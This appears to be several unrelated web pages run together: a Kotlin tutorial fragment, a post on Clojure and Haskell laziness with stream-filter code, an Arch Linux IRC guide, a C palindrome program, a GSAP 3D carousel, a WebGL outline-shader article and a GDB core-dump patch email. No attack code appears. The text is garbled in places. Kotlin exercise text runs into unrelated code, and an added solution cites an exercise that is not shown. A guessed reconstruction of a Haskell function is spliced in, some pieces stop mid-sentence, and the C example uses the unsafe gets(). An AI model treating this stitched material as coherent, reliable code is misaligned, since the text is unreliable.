this patch into 8.3, since it's pretty "self-contained", but I will leave that decision to the GMs. gdb/ChangeLog: 2019-04-24 Sergio Durigan Junior <sergiodj@redhat.com> PR corefiles/11608 PR corefiles/18187 * linux-tdep.c (dump_mapping_p): Add new parameters "ADDR" and "OFFSET". Verify if current mapping contains an ELF header. 
(linux_find_memory_regions_full): Adjust call to "dump_mapping_p". gdb/testsuite/ChangeLog: 2019-04-24 Sergio Durigan Junior <sergiodj@redhat.com> PR corefiles/11608 PR corefiles/18187 * gdb.base/coredump-filter-build-id.exp: New file. * lib/future.exp (gdb_find_eu-unstrip): New procedure. --- gdb/linux-tdep.c | 71 +++++++++++++++---- .../gdb.base/coredump-filter-build-id.exp | 69 ++++++++++++++++++ gdb/testsuite/lib/future.exp | 10 +++ 3 files changed, 137 insertions(+), 13 deletions(-) create mode 100644 gdb/testsuite/gdb.base/coredump-filter-build-id.exp diff --git a/gdb/linux-tdep.c b/gdb/linux-tdep.c index 5de985def3..d71a00666f 100644 --- a/gdb/linux-tdep.c +++ b/gdb/linux-tdep.c @@ -586,8 +586,8 @@ mapping_is_anonymous_p (const char *filename) } /* Return 0 if the memory mapping (which is related to FILTERFLAGS, V, - MAYBE_PRIVATE_P, and MAPPING_ANONYMOUS_P) should not be dumped, or - greater than 0 if it should. + MAYBE_PRIVATE_P, MAPPING_ANONYMOUS_P, ADDR and OFFSET) should not + be dumped, or greater than 0 if it should. In a nutshell, this is the logic that we follow in order to decide if a mapping should be dumped or not. @@ -625,12 +625,17 @@ mapping_is_anonymous_p (const char *filename) see 'p' in the permission flags, then we assume that the mapping is private, even though the presence of the 's' flag there would mean VM_MAYSHARE, which means the mapping could still be private. - This should work OK enough, however. */ + This should work OK enough, however. + + - Even if, at the end, we decided that we should not dump the + mapping, we still have to check if it is something like an ELF + header (of a DSO or an executable, for example). If it is, and + if the user is interested in dump it, then we should dump it. */ static int dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, int maybe_private_p, int mapping_anon_p, int mapping_file_p, - const char *filename) + const char *filename, ULONGEST addr, ULONGEST offset) { /* Initially, we trust in what we received from our caller. This value may not be very precise (i.e., it was probably gathered @@ -640,6 +645,7 @@ dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, (assuming that the version of the Linux kernel being used supports it, of course). */ int private_p = maybe_private_p; + int dump_p; /* We always dump vDSO and vsyscall mappings, because it's likely that there'll be no file to read the contents from at core load time. @@ -680,13 +686,13 @@ dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, /* This is a special situation. It can happen when we see a mapping that is file-backed, but that contains anonymous pages. */ - return ((filterflags & COREFILTER_ANON_PRIVATE) != 0 - || (filterflags & COREFILTER_MAPPED_PRIVATE) != 0); + dump_p = ((filterflags & COREFILTER_ANON_PRIVATE) != 0 + || (filterflags & COREFILTER_MAPPED_PRIVATE) != 0); } else if (mapping_anon_p) - return (filterflags & COREFILTER_ANON_PRIVATE) != 0; + dump_p = (filterflags & COREFILTER_ANON_PRIVATE) != 0; else - return (filterflags & COREFILTER_MAPPED_PRIVATE) != 0; + dump_p = (filterflags & COREFILTER_MAPPED_PRIVATE) != 0; } else { @@ -695,14 +701,53 @@ dump_mapping_p (filter_flags filterflags, const struct smaps_vmflags *v, /* This is a special situation. It can happen when we see a mapping that is file-backed, but that contains anonymous pages. 
*/ - return ((filterflags & COREFILTER_ANON_SHARED) != 0 - || (filterflags & COREFILTER_MAPPED_SHARED) != 0); + dump_p = ((filterflags & COREFILTER_ANON_SHARED) != 0 + || (filterflags & COREFILTER_MAPPED_SHARED) != 0); } else if (mapping_anon_p) - return (filterflags & COREFILTER_ANON_SHARED) != 0; + dump_p = (filterflags & COREFILTER_ANON_SHARED) != 0; else - return (filterflags & COREFILTER_MAPPED_SHARED) != 0; + dump_p = (filterflags & COREFILTER_MAPPED_SHARED) != 0; } + + /* Even if we decided that we shouldn't dump this mapping, we still + have to check whether (a) the user wants us to dump mappings + containing an ELF header, and (b) the mapping in question + contains an ELF header. If (a) and (b) are true, then we should + dump this mapping. + + A mapping contains an ELF header if it is a private mapping, its + offset is zero, and its first word is ELFMAG. */ + if (!dump_p && private_p && offset == 0 + && (filterflags & COREFILTER_ELF_HEADERS) != 0) + { + /* Let's check if we have an ELF header. */ + gdb::unique_xmalloc_ptr<char> header; + int errcode; + + /* Useful define specifying the size of the ELF magical + header. */ +#ifndef SELFMAG +#define SELFMAG 4 +#endif + + /* Read the first SELFMAG bytes and check if it is ELFMAG. */ + if (target_read_string (addr, &header, SELFMAG, &errcode) == SELFMAG + && errcode == 0) + { + const char *h = header.get (); + + if (h[EI_MAG0] == ELFMAG0 && h[EI_MAG1] == ELFMAG1 + && h[EI_MAG2] == ELFMAG2 && h[EI_MAG3] == ELFMAG3) + { + /* This mapping contains an ELF header, so we + should dump it. */ + dump_p = 1; + } + } + } + + return dump_p; } /* Implement the "info proc" command. */ @@ -1306,7 +1351,7 @@ linux_find_memory_regions_full (struct gdbarch *gdbarch, if (has_anonymous) should_dump_p = dump_mapping_p (filterflags, &v, priv, mapping_anon_p, mapping_file_p, - filename); + filename, addr, offset); else { /* Older Linux kernels did not support the "Anonymous:" counter. diff --git a/gdb/testsuite/gdb.base/coredump-filter-build-id.exp b/gdb/testsuite/gdb.base/coredump-filter-build-id.exp new file mode 100644 index 0000000000..fc2b039406 --- /dev/null +++ b/gdb/testsuite/gdb.base/coredump-filter-build-id.exp @@ -0,0 +1,69 @@ +# whether GDB's gcore/generate-core-file command can dump memory +# mappings with ELF headers, containing a build-id note. +# +# Due to the fact that we don't have an easy way to process a corefile +# and look for specific notes using GDB/dejagnu, we rely on an +# external tool, eu-unstrip, to verify if the corefile contains +# build-ids. + +standard_testfile "normal.c" + +# This test is Linux x86_64 only. +if { ![istarget *-*-linux*] } { + untested "$testfile.exp" + return -1 +} +if { ![istarget "x86_64-*-*"] || ![is_lp64_target] } { + untested "$testfile.exp" + return -1 +} + +if { [prepare_for_testing "failed to prepare" $testfile $srcfile debug] } { + return -1 +} + +if { ![runto_main] } { + untested "could not run to main" + return -1 +} + +# First we need to generate a corefile. +set corefilename "[standard_output_file gcore.test]" +if { ![gdb_gcore_cmd "$corefilename" "save corefile"] } { + verbose -log "Could not save corefile" + untested "$testfile.exp" + return -1 +} + +# Determine if GDB dumped the mapping containing the build-id. This +# is done by invoking an external program (eu-unstrip). 
+if { [catch "exec [gdb_find_eu-unstrip] -n --core $corefilename" output] == 0 } { + set line [lindex [split $output "\n"] 0] + set test "gcore dumped mapping with build-id" + + verbose -log "First line of eu-unstrip: $line" + + if { [regexp "^${hex}\\+${hex} \[a-f0-9\]+@${hex}.*[string_to_regexp $binfile]$" $line] } { + pass "$test" + } else { + fail "$test" + } +} else { + verbose -log "Could not execute eu-unstrip program" + untested "$testfile.exp" +} diff --git a/gdb/testsuite/lib/future.exp b/gdb/testsuite/lib/future.exp index a56cd019b4..122e652858 100644 --- a/gdb/testsuite/lib/future.exp +++ b/gdb/testsuite/lib/future.exp @@ -162,6 +162,16 @@ proc gdb_find_readelf {} { return $readelf } +proc gdb_find_eu-unstrip {} { + global EU_UNSTRIP_FOR_TARGET + if [info exists EU_UNSTRIP_FOR_TARGET] { + set eu_unstrip $EU_UNSTRIP_FOR_TARGET + } else { + set eu_unstrip [transform eu-unstrip] + } + return $eu_unstrip +} + proc gdb_default_target_compile {source destfile type options} { global target_triplet global tool_root_dir -- 2.17.2
https://sourceware.org/legacy-ml/gdb-patches/2019-04/msg00479.html
CC-MAIN-2022-40
en
refinedweb
matplotlib.pyplot.show(*args, **kw)

When running in IPython with its pylab mode, show() displays all figures and returns to the IPython prompt. In non-interactive mode it displays all figures and blocks until the figures have been closed. In interactive mode it has no effect unless figures were created prior to a change from non-interactive to interactive mode.

Hey @anonymus, to change the default rc settings in a Python script, you need to know that all the rc values are stored in a dictionary-like variable known as matplotlib.rcParams. This is a global, package-level dictionary and it can be modified like this:

import matplotlib as mpl
import matplotlib.pyplot as plt

mpl.rcParams['lines.linewidth'] = length
mpl.rcParams['lines.color'] = 'color'
plt.plot(data)

Hope this helps.
https://www.edureka.co/community/34032/record-limits-displayed-plot-using-matplotlib-show-module?show=34169
CC-MAIN-2022-40
en
refinedweb
26 Custom Directives

As with many other features of Angular, you can extend functionality by creating your own custom directives. Custom directives allow you to extend the functionality of HTML by implementing the behavior of elements yourself. If you have code that needs to manipulate the DOM, it should be done inside a custom directive.

You implement a custom directive by using the @Directive decorator, much the same way you define a component. The @Directive metadata should include the selector of the directive to be used in the HTML. The directive's exported class is where the logic for the directive will reside. For example, the following is a basic definition for a directive:

import { Directive } from '@angular/core';

@Directive({
  selector: ...
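Since the book's code sample is cut off above, here is a separate, minimal sketch (not taken from the book) of what a complete attribute directive along these lines can look like; the selector and class names are illustrative:

import { Directive, ElementRef } from '@angular/core';

// Minimal attribute directive: highlights the host element it is attached to.
@Directive({
  selector: '[appHighlight]'
})
export class HighlightDirective {
  constructor(el: ElementRef) {
    // Directives get access to the host element and can manipulate the DOM here.
    el.nativeElement.style.backgroundColor = 'yellow';
  }
}

It would be applied in a template as an attribute, for example <p appHighlight>Highlighted text</p>, after declaring the directive in the relevant module.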
https://www.oreilly.com/library/view/nodejs-mongodb-and/9780134655642/ch26.xhtml
CC-MAIN-2022-40
en
refinedweb
D-Foundations

VIKTOR's D-Foundations integration requires a specific D-Foundations worker which can be downloaded here. The D-Foundations binding is created to work with D-Foundations version v17. Other versions of D-Foundations might not be able to read the generated input files properly.

A D-Foundations binding has been developed by VIKTOR to simplify the process of creating a D-Foundations model, running an analysis (worker required) and parsing the results. The process consists of the following steps:

- Create the 'empty' model (optionally with default materials), applying the desired settings.
- (Optional) Create material(s). It is also possible to only use the default materials.
- Create or import profile(s).
- Create pile type(s).
- Create pile(s).
- Let VIKTOR generate the input file for you.
- Run the D-Foundations analysis (worker required) with the input file.
- Obtain and parse the results, and process them as desired.

Supported model types

D-Foundations supports 4 types of models. The following types are currently (un)supported in the D-Foundations binding:

- Bearing Piles (EC7-NL): supported
- Bearing Piles (EC7-B): not supported
- Tension Piles (EC7-NL): supported
- Shallow Foundations (EC7-NL): not supported

Creating the model (example: Bearing Piles (EC7-NL) model)

The class BearingPilesModel represents the Bearing Piles (EC7-NL) model in D-Foundations. The following code shows how a (minimal) bearing piles model can be created in Python using the binding. The Tension Piles (EC7-NL) model can be created in a similar way, using the TensionPilesModel class.

from viktor.external.dfoundations import BearingPilesCalculationOptions
from viktor.external.dfoundations import CalculationType
from viktor.external.dfoundations import BearingPilesModel
from viktor.external.dfoundations import ConstructionSequence
from viktor.external.dfoundations import SoilType
from viktor.external.dfoundations import ProfileLayer
from viktor.external.dfoundations import RectPile
from viktor.external.dfoundations import PileType
from viktor.external.dfoundations import PileSlipLayer
from viktor.external.dfoundations import Metadata
from viktor.external.dfoundations import DFoundationsAnalysis

# Create the model with misc. options.
options = BearingPilesCalculationOptions(CalculationType.BEARING_CAPACITY_AT_FIXED_PILE_TIP_LEVEL, False)
model = BearingPilesModel(ConstructionSequence.CPT_INSTALL_EXCAVATION, options, -5.0)

# Create material (optional), or use one of the default material names.
model.create_material("my_material", SoilType.SAND, 19.0, 19.0, 3.0)

# Create profile(s).
layers = [ProfileLayer(0.0, "my_material"), ProfileLayer(-20.0, "my_material")]
measurements = [(0.0, 10.0), (-20.0, 20.0)]
model.create_profile('my_profile', layers, 0.0, 0.0, measurements, -5.0, -15.0, 1.0, -10.0, -12.0, -0.11)

# Create pile type(s).
shape = RectPile(1.0, 1.0)
model.create_pile_type("my_pile_type", shape, PileType.PREFAB_CONCRETE, PileSlipLayer.NONE)

# Create pile(s).
model.create_pile("my_pile", 0.0, 0.0, -1.0, 1.0, 0.0, 0.0)

# Generate the input file for the model as if it was generated by D-Foundations.
# Metadata can be used (not required) to update data such as titles, company, etc.
metadata = Metadata(title_1='Example Model', company='VIKTOR')
foi_file = model.generate_input_file(metadata)

# Run the analysis with the generated input file (requires worker).
analysis = DFoundationsAnalysis(foi_file)
analysis.execute(300)

# Obtain the result file.
fod_file = analysis.get_output_file()

Parsing output using OutputFileParser

After running a DFoundationsAnalysis, the fod file can be obtained and results can be extracted. The class OutputFileParser makes the parsing more convenient and returns Python objects that can be further processed:

from viktor.external.dfoundations import OutputFileParser

parser = OutputFileParser(fod_file)

# Calculation parameters.
calculation_parameters = parser.calculation_parameters

# Parsed results in the form of a dictionary.
results = parser.results(False)  # True (default) for returning pandas DataFrame(s).

# Raw, unparsed results in the form of a string.
# Manual parsing required. Useful if parser.results is not sufficient.
raw_results = parser.raw_results

Supported D-Foundations versions

Currently, the parser supports the following versions (completely or partially) of D-Foundations:

v17:
- Tension Piles model
- Bearing Piles model
- Preliminary Design (calculation options only)

v19:
- Tension Piles model
- Bearing Piles model
- Verification
https://docs.viktor.ai/docs/create-apps/software-integrations/dfoundations/
CC-MAIN-2022-40
en
refinedweb
JavaScript utility libraries

The Web3.Storage JavaScript client library provides a simple interface for interacting with Web3.Storage. This page highlights some additional libraries that may be helpful when working with the client library, or when using the HTTP API directly.

files-from-path

The files-from-path package provides a simple way for Node.js users to load files from the filesystem into the File objects that the Web3.Storage client library likes to use. Here's a quick example:

import { getFilesFromPath } from 'web3.storage';

async function storeFiles(path = 'path/to/somewhere') {
  const files = await getFilesFromPath(path);
  for (const f of files) {
    console.log(f);
    // { name: '/path/to/me', stream: [Function: stream] }
  }

  const web3Storage = getStorageClient();
  const cid = await web3Storage.put(files);
  console.log(`stored ${files.length} files. cid: ${cid}`);
}

Note that if you're using the client library you don't need to install the files-from-path package separately. Instead, just import the getFilesFromPath or filesFromPath functions from the web3.storage package.

ipfs-car

The Web3.Storage API works with Content Archive (CAR) files, which package up content addressed data into a simple format for storage and transport. Internally, the client library uses the ipfs-car package to create CARs from regular files before sending data to the API. If you prefer to work with CARs directly, see the how-to guide on working with Content Archives for usage information for ipfs-car and information about other options.

carbites

The carbites package includes a command line tool and JavaScript API for splitting Content Archive (CAR) files into chunks. This is used to upload files that are larger than the 100MB size limit on the upload HTTP endpoint. See the how-to guide on working with Content Archives for more information on using the carbites tool.
https://web3.storage/docs/reference/js-utilities/
CC-MAIN-2022-40
en
refinedweb
: - Monitor the calls to your service across multiple servers with AppFabric Monitoring - Eliminate the .svc extension from the URI by using routing - Create custom Event Tracing for Windows (ETW) events that will be logged by AppFabric Monitoring - Provide a simple HTML page for invoking the service with or without the .svc extension Setup To build and test an AppFabric WCF HTTP: } - Build the solution> Enable Routing - Open web.config - Enable ASP.NET Compatibility for WCF 1: <system.serviceModel> 2: <serviceHostingEnvironment aspNetCompatibilityEnabled="true" /> 3: </system.serviceModel> - Enable the UrlRouting module.> - Add global.asax - Add the following namespace directives 1: using System.Web.Routing; 2: using System.ServiceModel.Activation; - Add code to the Application_Start method to register the route. 1: protected void Application_Start(object sender, EventArgs e) 2: { 3: RouteTable.Routes.Add(new ServiceRoute( 4: "SampleService", /* Replace SampleService with your service name */ 5: new WebServiceHostFactory(), 6: typeof(SampleService))); /* Replace SampleService with your service name */ 7: } Verify with Development Server - In the Solution Explorer window, right click on the generated HTM file for your service. For example SampleService.svc.htm and select View in Browser. - The ASP.NET Development Server will start and your page will load in the browser. - and select properties - Go to the Web tab - Check Use Local IIS Web Server and click Create Virtual Directory - Save your project settings (Debugging will not save them) - In the Solution Explorer window, right click on the generated HTM file for your service. For example SampleService.svc.htm and select View in Browser. The address should now be that of the IIS (“”) and not of the ASP.NET Development Server (“”). - AppFabric. It groups calls by URI so calls without the .SVC extension look like a different service. - Switch back to your browser, leave the text box empty (clear it if necessary) and click the link for service with the .svc extension and the link for the service without the .svc extension. This will generate a warning event. - To see the monitoring for these activities switch back to the IIS Manager and refresh the AppFabric Dashboard. - Click on the link in the WCF Call History for SampleService.svc and you will see events for the completed calls. - To see specific events, right click on an entry for the SayHello operation and select View All Related Events. - In the list of related events you will see the user defined event named SayHello. The payload of this event contains the message logged by the operation.
https://blogs.msdn.microsoft.com/rjacobs/2011/03/03/appfabric-wcf-http-service-template/
CC-MAIN-2017-22
en
refinedweb
In this article, we will learn about the solution to the problem statement given below.

Problem statement − We are given a string; we need to count the number of uppercase and lowercase characters present in the string without using the inbuilt functions.

This could easily be solved by using the islower() and isupper() functions available in Python, but here the constraint is not to use those inbuilt functions. So we take the help of the ASCII value of the characters. Using the ord() function we compute the ASCII value of each character present in the string and then compare it to check for uppercase and lowercase, as shown below.

def upperlower(string):
   upper = 0
   lower = 0
   for i in range(len(string)):
      # For lowercase
      if (ord(string[i]) >= 97 and ord(string[i]) <= 122):
         lower += 1
      # For uppercase
      elif (ord(string[i]) >= 65 and ord(string[i]) <= 90):
         upper += 1
   print('Lower case characters = '+str(lower))
   print('Upper case characters = '+str(upper))

# Driver Code
string = 'TutorialsPoint'
upperlower(string)

Output

Lower case characters = 12
Upper case characters = 2

All the variables are declared in the local scope.

In this article, we have learned how to count the uppercase and lowercase characters present in a given string.
https://www.tutorialspoint.com/count-upper-and-lower-case-characters-without-using-inbuilt-functions-in-python-program
CC-MAIN-2020-24
en
refinedweb
Just a matter of adding a statfs wrapper for the valgrind port. Happy to code this up if nobody has any objections. Error occurred as follows: (568)|thinkpad|gardei|~/valgrind-debug| $>>freebsd-version 12.0-RELEASE (569)|thinkpad|gardei|~/valgrind-debug| $>>cat disk.c #include <sys/statvfs.h> int main() { struct statvfs fs; return statvfs("/", &fs); } (570)|thinkpad|gardei|~/valgrind-debug| $>>valgrind ./a.out ==12810== Memcheck, a memory error detector ==12810== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al. ==12810== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info ==12810== Command: ./a.out ==12810== --12810-- WARNING: unhandled syscall: 555 --12810-- You may be able to write your own handler. --12810-- Read the file README_MISSING_SYSCALL_OR_IOCTL. --12810-- Nevertheless we consider this a bug. Please report --12810-- it at. ==12810== ==12810== HEAP SUMMARY: ==12810== in use at exit: 0 bytes in 0 blocks ==12810== total heap usage: 0 allocs, 0 frees, 0 bytes allocated ==12810== ==12810== All heap blocks were freed -- no leaks are possible ==12810== ==12810== For counts of detected and suppressed errors, rerun with: -v ==12810== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) Seems to be related to A patch is already provided there, although it does not handle syscalls with following ids: fhstat 553 statfs 555 fhstatfs 558 Maintainership dropped ports r495096. Assign to new maintainer. (In reply to Michael Buch from comment #0) With my github repo () I get paulf> ../../../vg-in-place ./statvfs ==26238== Memcheck, a memory error detector ==26238== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==26238== Using Valgrind-3.16.0.GIT and LibVEX; rerun with -h for copyright info ==26238== Command: ./statvfs ==26238== ==26238== ==26238== HEAP SUMMARY: ==26238== in use at exit: 0 bytes in 0 blocks ==26238== total heap usage: 0 allocs, 0 frees, 0 bytes allocated ==26238== ==26238== All heap blocks were freed -- no leaks are possible ==26238== ==26238== For lists of detected and suppressed errors, rerun with: -s ==26238== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=235720
CC-MAIN-2020-24
en
refinedweb
Persisting ProcessInstance at arbitrary state

brianmb99 Oct 14, 2005 4:05 PM

Hi, I am new to jBPM and it looks great to me so far. There's something I'm not quite getting though - maybe I just don't understand the proper way to use a process definition.

I want to persist a ProcessInstance at an arbitrary stage of the process execution. For example, a process has three nodes: "Start", "Dostuff" and "End". If I start a new jbpmSession transaction, get the process definition from the database, and signal a new ProcessInstance to start, how do I persist the ProcessInstance somewhere in the "Dostuff" state? I don't think I can make a new jbpmSession/transaction inside another one. I've tried manually threading the process execution, but running a process in multiple threads doesn't seem to work well, and other topics in this forum indicate that it's not the right way to do things.

Any pointers would be appreciated. Thanks!

Brian

1. Re: Persisting ProcessInstance at arbitrary state
koen.aers Oct 15, 2005 4:46 AM (in response to brianmb99)

Brian,

The ProcessInstance *is* persisted in the "DoStuff" state. The state is the situation in which the process instance is waiting for the next thing to happen.

Regards,
Koen

2. Re: Persisting ProcessInstance at arbitrary state
brianmb99 Oct 15, 2005 7:50 PM (in response to brianmb99)

Thanks, Koen. So if I understand correctly, it would not be appropriate to do

public class MyActionHandler implements ActionHandler {
   public void execute(ExecutionContext executionContext) throws Exception {
      saveProcessInstanceToDB();
      String result = someLongRunningPotentiallyUnstableProcess();
      executionContext.getToken().signal(result);
   }
}

but instead one should do

public class MyActionHandler implements ActionHandler {
   public void execute(ExecutionContext executionContext) throws Exception {
      long tokenId = executionContext.getToken().getId();
      sendAsyncMessageToStartALongRunningProcess(tokenId);
   }
}

public class MyMessageConsumer {
   public void consumeMessage(long tokenId) {
      String result = someLongRunningProcess();
      jbpmSession.beginTransaction();
      Token myToken = jbpmSession.getGraphSession().loadToken(tokenId);
      myToken.signal(result);
      jbpmSession.commitTransactionAndClose();
   }
}

or something along those lines? Thanks much for your help with my perhaps elementary question.

Brian.

3. Re: Persisting ProcessInstance at arbitrary state
kukeltje Oct 15, 2005 8:15 PM (in response to brianmb99)

Yep... and you know what.... look at the latest code in cvs. Work is coming along nicely on this part. Maybe you can try it out and find bugs in it.

Ronald

4. Re: Persisting ProcessInstance at arbitrary state
brianmb99 Oct 15, 2005 8:29 PM (in response to brianmb99)

Great, thanks. I'm putting together a report on jBPM for my dev team - it looks promising. If we decide to go with jBPM you'll be hearing a lot more from me and I'll try to help out where I can - reporting bugs or whatever! Thanks for your hard work on this promising project and for the prompt replies in the forum.

Brian
https://developer.jboss.org/thread/112386
CC-MAIN-2020-24
en
refinedweb
OpenCV is a popular open-source computer vision and machine learning software library with many computer vision algorithms including identifying objects, identifying actions, and tracking movements. The tracking algorithms use optical flow to compute motion vectors that represent the relative motion of pixels (and hence objects) between images. Computation of optical flow vectors is a computationally expensive task. However, OpenCV 4.1.1 introduces the ability to use hardware acceleration on NVIDIA Turing GPUs to dramatically accelerate optical flow calculation. NVIDIA Turing GPUs include dedicated hardware for computing optical flow (OF). This dedicated hardware uses sophisticated algorithms to yield highly accurate flow vectors, which are robust to frame-to-frame intensity variations, and track true object motion. Computation is significantly faster than other methods at comparable accuracy. The new NVIDIA hardware accelerated OpenCV interface is similar to that of other optical flow algorithms in OpenCV so developers can easily port and accelerate their existing optical flow based applications with minimal code changes. More details about the OpenCV integration can be found here. Optical Flow calc in OpenCV OpenCV supports a number of optical flow algorithms. The pyramidal version of Lucas-Kanade method ( SparsePyrLKOpticalFlow) computes the optical flow vectors for a sparse feature set. OpenCV also contains a dense version of pyramidal Lucas-Kanade optical flow. Many of these algorithms have CUDA-accelerated versions; for example BroxOpticalFlow, FarnebackOpticalFlow, DualTVL1OpticalFlow. In all cases these classes implement a calc function which takes two input images and returns the flow vector field between them. Hardware-Accelerated Optical Flow The NvidiaHWOpticalFlow class implements NVIDIA hardware-accelerated optical flow into OpenCV. This class implements a calc function similar to other OpenCV OF algorithms. The function takes two images as input and returns dense optical flow vectors between the input images. Optical flow is calculated on a dedicated hardware unit in the GPU silicon which leaves the streaming multiprocessors (typically used by CUDA programs) free to perform other tasks. The optical flow hardware returns fine grained flow vectors with quarter-pixel accuracy. The default granularity is 4×4 pixel blocks but can be further refined using various upsampling algorithms. Helper functions are available in class NvidiaHWOpticalFlow to increase the flow vector granularity to 1×1 (per-pixel) or 2×2 block sizes. In addition to supporting the basic OpenCV-OF functionality, NvidiaHWOpticalFlow also provides features for low-level control and performance tuning. Presets help developers fine-tune the balance between performance and quality. Developers can also enable or disable temporal hints so that the hardware uses previously generated flow vectors as internal hints to calculate optical flow for the current pair of frames. This is useful when computing flow vectors between successive video frames. Programmers can also set external hints, if available, to aid the computation of flow vectors. The optical flow library also outputs the confidence for each generated flow vector in the form of cost. The cost is inversely proportional to the confidence of the flow vectors and allows the user to make application-level decisions; e.g. accept/reject the vectors based on a confidence threshold. 
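As an aside (a sketch of my own, not from this post): the cost output described above lets an application accept or reject flow vectors by confidence. Assuming the cost buffer has been enabled when the optical flow object is created, and that the per-block cost comes back as a NumPy array alongside the flow field (both assumptions; check the SDK documentation for the exact return layout), low-confidence vectors can be masked out with ordinary NumPy operations:

import numpy as np

# 'flow' is assumed to have shape (H, W, 2) and 'cost' shape (H, W); these
# shapes and the threshold value are assumptions, not values from the post.
def filter_by_confidence(flow, cost, threshold=10):
    # Cost is inversely proportional to confidence, so keep only low-cost vectors.
    keep = cost < threshold
    filtered = np.zeros_like(flow)
    filtered[keep] = flow[keep]
    return filtered, keep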
The results of four different optical flow algorithms in OpenCV are demonstrated in the above video. The video compares the time it takes to calculate the optical flow vectors between successive frames and shows GPU utilization. NVIDIA hardware optical flow is extremely fast, computing vectors in 2 to 3ms per frame, and highly accurate while consuming very little GPU. Comparatively Farneback takes ~8ms per frame and returns lower accuracy flow vectors. Lucas-Kanade takes well over 20ms per frame and also returns lower accuracy flow vectors. TVL1 provides the highest accuracy optical flow vectors, but is computationally very expensive taking over 300ms per frame. Installing NvidiaHWOpticalFlow The OpenCV implementation of NVIDIA hardware optical flow leverages the NVIDIA Optical Flow SDK which is a set of APIs and libraries to access the hardware on NVIDIA Turing GPUs. Developers desiring low-level control can use the APIs exposed in the SDK to achieve the highest possible performance. The new OpenCV interface provides an OpenCV-framework-compliant wrapper around the NVIDIA Optical Flow SDK. The objective of providing such a wrapper is to facilitate easy integration and drop-in-compatibility with other optical flow algorithms available in OpenCV. The OpenCV implementation of NVIDIA hardware optical flow is available in the contrib branch of OpenCV. Follow the steps in the links below to install OpenCV contrib build along with its Python setup. Note that NVIDIA Optical flow SDK is a prerequisite for these steps and is installed by default as a git submodule. Windows: Linux: If you have questions regarding installing or using NvidiaHWOpticalFlow please post your question on the Video Codec and Optical Flow SDK forum. Docker Configuration While launching the Docker it is essential to configure the NVIDIA container library component (libnvidia-container) to expose the libraries required for encode, decode and optical flow. This can be done by adding the following command line option when launching the docker: “ -e NVIDIA_DRIVER_CAPABILITIES=compute,video,utility” Python Bindings Accessing NVIDIA optical flow via Python helps deep learning applications that require optical flow vectors between frames. OpenCV Python is a wrapper class for the original C++ library so it can be used with Python. A Python interface for NvidiaHWOpticalFlow class is also available. The OpenCV array structures gets converted to NumPy arrays which makes it easier to integrate with other libraries that use NumPy. Here is a sample code which calculates optical flow between the two images basketball1.png and basketball2.png – both images are a part of the OpenCV samples: import numpy as np import cv2 frame1 = (cv2.imread('basketball1.png', cv2.IMREAD_GRAYSCALE)) frame2 = (cv2.imread('basketball2.png', cv2.IMREAD_GRAYSCALE)) nvof = cv2.cuda_NvidiaOpticalFlow_1_0.create(frame1.shape[1], frame1.shape[0], 5, False, False, False, 0) flow = nvof.calc(frame1, frame2, None) flowUpSampled = nvof.upSampler(flow[0], frame1.shape[1], frame1.shape[0], nvof.getGridSize(), None) cv2.writeOpticalFlow('OpticalFlow.flo', flowUpSampled) nvof.collectGarbage() Accuracy Comparison Average end-point error (EPE) for a set of optical flow vectors is defined as the average of the Euclidian distance between the true flow vector (i.e. ground truth) and the flow vector calculated by the algorithm being evaluated. Lower average EPE generally implies better quality of the flow vectors. 
Figure 2, Figure 3, and Figure 4 show the EPE obtained for the Middlebury, KITTI 2015, and MPI Sintel benchmark datasets using various optical flow algorithms available in OpenCV.

References
- OpenCV library
- NVIDIA Optical Flow SDK
- NVIDIA Optical Flow Programming Guide (requires program membership)
- Developer Blog: An Introduction to the NVIDIA Optical Flow SDK
https://devblogs.nvidia.com/opencv-optical-flow-algorithms-with-nvidia-turing-gpus/
CC-MAIN-2020-24
en
refinedweb
OK, suppose the following happens:

1. Front-line helpdesk forwards (rather than bounces) a query into RT.
2. The ticket appears with the helpdesk as requestor.
3. We delete the helpdesk and add the email address of the end user as requestor. This email address isn't an RT user at present, so RT tries to look it up to change the requestor ID, and fails. The requestor ID is still the helpdesk's ID.
4. We send correspondence, which correctly goes to the end user by email.
5. End user replies.

Now what happens? The end user doesn't actually have a "user" entry in the RT database, so when he replies, RT creates one for him. RT then checks to see if this new user is the same as the requestor of the ticket - which obviously it isn't, because we've established in (3) that the ID is still the helpdesk's ID. (Trust me, we've seen this happen here.) So the end user ends up having his mail bounced and being told he's not actually the requestor and doesn't have permission to correspond on the ticket.

Moral of the story? Requestors must have valid user IDs. This patch makes it so.

--- /home/simon/rt-2-0-6/lib/RT/Watcher.pm  Tue Apr 3 07:31:14 2001
+++ RT/Watcher.pm  Wed Oct 17 17:29:20 2001
@@ -78,8 +78,25 @@
     }
   }
+  if ($args{'Type'} eq "Requestor" and $args{'Owner'} == 0) {
+    # Requestors *MUST* have an ID.
+    my $NewUser = RT::User->new($RT::SystemUser);
+    my ($Val, $Message) = $NewUser->Create(Name => ($Username || $Address),
+                                           RealName => "$Name",
+                                           Password => undef,
+                                           Privileged => 0,
+                                          );
+    return (0, "Could not create watcher for requestor") unless $Val;
+    if ($NewUser->id) {
+      $args{'Owner'} = $NewUser->id;
+      delete $args{'Email'};
+    }
+  }
   #Make sure we've got a valid type
   #TODO -- move this to ValidateType
   return (0, "Invalid Type")

Simon Cozens
Unix Systems Programmer
Oxford University Computer Services
https://forum.bestpractical.com/t/requestors-must-have-an-id/6483
CC-MAIN-2020-24
en
refinedweb
Telerik OpenAccess Domain Model types generated by the OpenAccess Create Model Wizard support binary serialization. When you serialize an object to a binary stream, all related objects currently loaded into the OpenAccessContext will also be serialized.

The examples in this topic are based on the Northwind domain model. To run the code in this example, you must have already added the Northwind domain model to your project. You must also add using statements for the namespaces used by the example (such as System.IO and System.Runtime.Serialization.Formatters.Binary).

In this example, a SerializeToBinaryStream method queries for the Customer object with the specified CustomerID value and returns a binary MemoryStream. The MemoryStream contains an object graph of the Customer object and its related CustomerDemographic and Order objects.
